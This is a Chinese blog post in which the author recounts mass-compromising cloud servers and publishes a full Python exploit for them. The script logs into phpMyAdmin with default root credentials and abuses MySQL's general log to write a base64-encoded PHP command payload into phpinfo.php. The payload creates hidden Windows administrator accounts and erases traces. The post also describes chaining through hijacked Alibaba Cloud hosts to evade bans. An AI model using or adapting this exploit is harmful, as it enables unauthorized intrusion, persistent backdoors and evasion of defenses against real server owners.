我在云上批量抓鸡的故事(下)–写EXP干就完事了！

这篇文章一年之前就写好了，但是一直在我草稿箱中不敢发出来，当时我数据库中全是肉鸡，慌得一批，这篇文章发出来又怕被不怀好意的人给利用，所以放了这么久。现在重新看了全文，文中的有些部分有些改动。这篇是上一篇文章的技术分析过程。之前一直都是通过手动渗透，在分析完原理后，我就将整个流程写成了自动化脚本。

因为在之前的文章中我有分析过如何渗透提权的过程，所以在这里我就不赘述了。直接分析如何编写exp。首先分析phpmyadmin的登录流程。这里我就随便找个后台演示。

这个是我们直接访问phpmyadmin登录页面的url得到的页面。此时我们随便输入一个密码来走一遍这个登录流程。至于用分析需要post哪些字段很简单，我就不在这里演示了。

所以要想完成登录这个过程，脚本中就必须拿到token值，最简单的办法就是通过正则匹配。写一个login函数来实现。这里这展示部分代码，完整的exp代码会在最后给出。

def login():
    url = 'http://肉鸡/phpmyadmin/index.php'
    s = requests.Session()
    r0 = s.get(url, timeout=2)
    token = re.search('value="[a-z0-9]{32}"', r0.text).group()[7:-1]
    payload = {'pma_username': 'root', 'pma_password': 'root', 'server': '1', 'lang': 'zh_CN','token':token}
    r1 = s.post(url,data=payload)
    if 'name="login_form"' not in r1.text:
        print('使用默认密码登录成功！')
    else:
        print('登录失败！')

解释一下是如何判断出的登录成功或失败的。在post数据过去之后，都会做一个302的跳转。如果登录成功就是phpmyadmin的后台管理页面了，失败则还是跳转到首页。我们可以将name=”login_form”这个字符串是否存在作为判断依据。

现在默认我们已经实现脚本模拟登录phpmyadmin的这个功能，进入到后台执行sql语句的界面。

接下来就是分析的重点了，我们要通过脚本来执行sql语句并获得返回的结果。比如执行 select @@version_compile_os 这条sql语句，是返回当前的操作系统。这里开始用burp抓包。

通过抓包的形式，主要是找出post过去的字段中那些必要的，这样可减少payload的长度。只要右侧能返回相应的数据即可。可以看到是向import.php发送的数据。

在不断删减post的字段之后，发现只有token和sql_query是必须的。那么关键字段分析的分析就完成了。

另外如何提取出SQL语句执行后得到的结果呢，也就是旁边黄色标记的win32。因为平时经常写爬虫，所以为了方便就没有用正则表达式来匹配，用Beautifulsoup来提取对应的标签。

sql_url = 'http://' + ip + '/phpmyadmin/import.php'
 
text = ['select @@datadir','SET GLOBAL general_log=ON',
        'set global general_log=off;set global general_log_file="MYSQL.log";']
 
def modle(sql_text):
    data = {'token': token, 'sql_query': sql_text}
    sql = requests.post(sql_url, data=data, cookies=cookies)
    soup = BeautifulSoup(sql.text, 'lxml')
    tag = soup.find_all('td')
    for i in tag:
        if i.string:
            print(i.string)
            result = i.string
            return result

我写了一个modle函数来说实现，因为后面需要提权，所以要执行的SQL语句肯定不止一条。其中传入的形参sql_text就是要执行的sql语句。

所以我把要执行的sql语句都放到了一个text的列表里面，根据索引值来执行对应的SQL语句。执行后得到的结果是以表格的形式返回的。所以我们用直接提取td标签，再把td标签的内容取出来即可。这样就完成了exp中模拟执行SQL语句的部分了。

接下来主要的部分就是提权的开始了，我们需要向文件中写入提权的命令，和写入webshell是一个意思，不过这里我们不写webshell，这样更安全，避免被云盾和安骑士查杀。但是我们需要找到当前文件的路径才行。

def get_path():
    path = modle(text[0])
    path = re.search('.*M', path).group()[:-1].replace('\\','/')+'www/phpinfo.php'
    print(path)
    return path

这里的modle(text[0])就是执行的select @@datadir 。

这里我写的是一个名为get_path的函数，因为用phpstudy的PHPmyadmin执行的这条sql语句的结果基本上都是在MySQL目录下的。但是网站的根目录实在他的上一级的www目录下的。所以我用了正则表达式来匹配到在\MySQL之前的那部分路径。

仔细观察返回的路径是用 \ 来分隔的，但是我们要写入路径是用的 / ，所以用了replace来替换。其中//是为了转义，这个想必大家都明白。

但是为什么我的文件名要用phpinfo.php来代替呢，这样做是为了掩人耳目！用过phpstudy的朋友应该都清楚他的根目录结构。

我用phpinfo.php来作为载体，把提权的命令写到这个里面，这样不会写入新的文件，最后即使删掉也不会太明显。然后再把日志文件的中日志改为phpinfo.php。

def create_file():
    file_path = 'set global general_log_file ="'+ get_path()+'"'
    modle(file_path)
    print(file_path)
    modle(text[1])

接下来就是最关键的构造exp的部分了。

def random_str():
    random_str = ''.join(random.sample(string.ascii_letters, 8))
    return random_str
 
def generate_random_exp():
    user = random_str() + '$'
    pwd = random_str()
    exp = '''echo [version] &gt; 1.inf &amp;&amp; echo signature="$CHICAGO$" &gt;&gt; 1.inf &amp;&amp; 
    echo [System Access] &gt;&gt; 1.inf &amp;&amp; echo PasswordComplexity = 0 &gt;&gt; 1.inf &amp;&amp; secedit 
    /configure /db temp.sdb /cfg 1.inf &amp; net user ''' + user + ' ' + pwd + ''' /add &amp; net 
    localgroup administrators ''' + user + ''' /add &amp;&amp; echo GetSuccess! &amp; del 1.inf 
    temp.sdb phpinfo.php &amp;&amp; echo DeleteSuccess! '''
    exp_base64 = base64.b64encode(exp.encode('utf-8')).decode('utf-8')
    exp_code = '''select '&lt;?php $str ="''' + exp_base64 + '''"; $code = base64_decode($str);echo `$code`;?&gt;';'''
    modle(exp_code)
    return user, pwd

这里我定义了两个函数，random_str是生成随机的字符串。是用于在exp中生成用户名和密码。对于exp部分我也不想多解释了，在我之前的文章中分析过。user后面还接了一个$，就是为了生成隐藏的管理员用户名，这样只是在cmd下使用net user看不到，其实也没什么实际的用处。

当然我是对这段exp做了base64编码的，然后在构造一段php的payload，相当于解码exp，写入到php文件中用于提权。因为这段exp并不是webshell，自然也不会被云盾查杀。

def check_exp():
    url_2 = 'http://' + ip + '/phpinfo.php'
    check = requests.get(url_2)
    time.sleep(5)
    print(check.text)
    if 'if 'GetSuccess!' in check.text' in check.text:
        print('Success !!!')
        return ip
    else:
        print('Failed !')
 
def delete():
    modle(text[2])

现在就是要触发exp执行了。通过查找页面中有没有GetSuccess!这个字符串来判断提权是否成功。

下面还有一个delete的函数，就是收尾工作，因为提取成功我们就有administrator的权限了，就可以把phpinfo.php这个中间文件也删除掉，清理痕迹。

从数据库中把存在弱口令的后台导出为txt文本，供exp执行。（补充）

现在提权部分已经完成了，那么接着就是批量提权了。这里我写了一个main函数就是从我的写的另一个脚本批量扫出来存在弱口令的ip的txt文本中取出ip执行exp。然后再把这些提权成功的肉鸡再写入我的数据库中。

def main():
    db = pymysql.Connect('ip', 'user', 'pwd', 'phpmyadmin')
    cursor = db.cursor()
    ip_list =get_ip_list()
    for ip in ip_list:
        try:
            ip = ip.strip()
            url, token, cookie_1 = get_token(ip)
            print(ip)
            if len(token) != 32:
                print('token 错误！')
                continue
            cookie_2 = login(url, token, cookie_1)
            if cookie_2 is False:
                continue
            cookies = get_cookie(cookie_1, cookie_2)
            user, pwd, ip = execute_sql(token, ip, cookies)
            if user and pwd and ip:
                time_now = str(datetime.datetime.now())[:-7]
                sql = "insert into rdesktop (user,pwd,ip,time) VALUES  ('%s','%s','%s','%s')" % (user,pwd,ip,time_now)
                print(sql)
                cursor.execute(sql)
                db.commit()
            else:
                continue
        except Exception as e:
            print(e)
    db.close()

然后扔到阿里云的肉鸡的上跑就行了。差不多就是这个样子。

不过我发现一个问题，可能阿里云做了态势感知什么的，当我用一台肉鸡批量跑exp，差不多提权30左右的其他肉鸡时这个ip就自动被阿里云ban掉了。所以我就想了其他的办法。让新抓的肉鸡继续执行exp，每只肉鸡执行20次exp就让新抓的肉鸡继续执行exp，这样递归下去就不会导致被ban掉。直到跑完我数据库中的所有的ip。

完整的exp代码如下，仅供技术分享。用于非法用途，后果自负！

import re
import time
import base64
import string
import random
import pymysql
import datetime
import requests
from bs4 import BeautifulSoup
 
def get_ip_list():
    with open('ip.txt','r')as f:
        ip_list = f.readlines()
    return ip_list
 
def get_token(ip):
    url = 'http://'+ip+'/phpmyadmin/index.php'
    y = requests.get(url,timeout = 1)
    token = re.search('token=.*" t',y.text).group()[6:-3]
    cookie_1 =y.cookies
    return url,token,cookie_1
 
def login(url,token,cookie_1):
    payload = {'pma_username': 'root', 'pma_password': 'root','server':'1 ','lang':'zh_CN','token':token}
    r = requests.post(url,data=payload,cookies = cookie_1,allow_redirects=False)
    cookie_2 = r.cookies
    if 'name="login_form"' not in r.text:
        print('使用默认密码登录成功！')
        return cookie_2
    else:
        print('登录失败！')
        return False
 
def get_cookie(cookie_1,cookie_2):
    dict_1 = requests.utils.dict_from_cookiejar(cookie_1)
    dict_2 = requests.utils.dict_from_cookiejar(cookie_2)
    dict_3 = dict(dict_1,**dict_2)
    cookies = requests.utils.cookiejar_from_dict(dict_3)
    return cookies
 
def execute_sql(token,ip,cookies):
    sql_url = 'http://' + ip + '/phpmyadmin/import.php'
    text = ['select @@datadir','SET GLOBAL general_log=ON',
            'set global general_log=off;set global general_log_file="MYSQL.log";']
 
    def modle(sql_text):
        data = {'token': token, 'sql_query': sql_text}
        sql = requests.post(sql_url, data=data, cookies=cookies)
        soup = BeautifulSoup(sql.text, 'lxml')
        tag = soup.find_all('td')
        for i in tag:
            if i.string:
                print(i.string)
                result = i.string
                return result
 
    def get_path():
        path = modle(text[0])
        path = re.search('.*M', path).group()[:-1].replace('\\','/')+'www/phpinfo.php'
        print(path)
        return path
 
    def create_file():
        file_path = 'set global general_log_file ="'+ get_path()+'"'
        modle(file_path)
        print(file_path)
        modle(text[1])
 
    def random_str():
        random_str = ''.join(random.sample(string.ascii_letters, 8))
        return random_str
 
    def generate_random_exp():
        user = random_str() + '$'
        pwd = random_str()
        exp = '''echo [version] &gt; 1.inf &amp;&amp; echo signature="$CHICAGO$" &gt;&gt; 1.inf &amp;&amp; 
        echo [System Access] &gt;&gt; 1.inf &amp;&amp; echo PasswordComplexity = 0 &gt;&gt; 1.inf &amp;&amp; secedit 
        /configure /db temp.sdb /cfg 1.inf &amp; net user ''' + user+ ' ' + pwd + ''' /add &amp; net 
        localgroup administrators ''' + user + ''' /add &amp;&amp; echo GetSuccess! &amp; del 1.inf 
        temp.sdb phpinfo.php &amp;&amp; echo DeleteSuccess! '''
        exp_base64 = base64.b64encode(exp.encode('utf-8')).decode('utf-8')
        exp_code = '''select '&lt;?php $str ="''' + exp_base64 + '''"; $code = base64_decode($str)
        ;echo `$code`;?&gt;';'''
        modle(exp_code)
        return user, pwd
 
    def check_exp():
        url_2 = 'http://' + ip + '/phpinfo.php'
        check = requests.get(url_2)
        time.sleep(5)
        print(check.text)
        if 'GetSuccess!' in check.text:
            print('Success !!!')
            return ip
        else:
            print('Failed !')
 
    def delete():
        modle(text[2])
 
    create_file()
    user,pwd = generate_random_exp()
    if check_exp() is None:
        return False
    delete()
    return user,pwd,ip
 
def main():
    db = pymysql.Connect('ip', 'user', 'pwd', 'phpmyadmin')
    cursor = db.cursor()
    ip_list =get_ip_list()
    for ip in ip_list:
        try:
            ip = ip.strip()
            url, token, cookie_1 = get_token(ip)
            print(ip)
            if len(token) != 32:
                print('token 错误！')
                continue
            cookie_2 = login(url, token, cookie_1)
            if cookie_2 is False:
                continue
            cookies = get_cookie(cookie_1, cookie_2)
            user, pwd, ip = execute_sql(token, ip, cookies)
            if user and pwd and ip:
                time_now = str(datetime.datetime.now())[:-7]
                sql = "insert into rdesktop (user,pwd,ip,time) VALUES  ('%s','%s','%s','%s')" % (user,pwd,ip,time_now)
                print(sql)
                cursor.execute(sql)
                db.commit()
            else:
                continue
        except Exception as e:
            print(e)
    db.close()
 
if __name__=='__main__':
    main()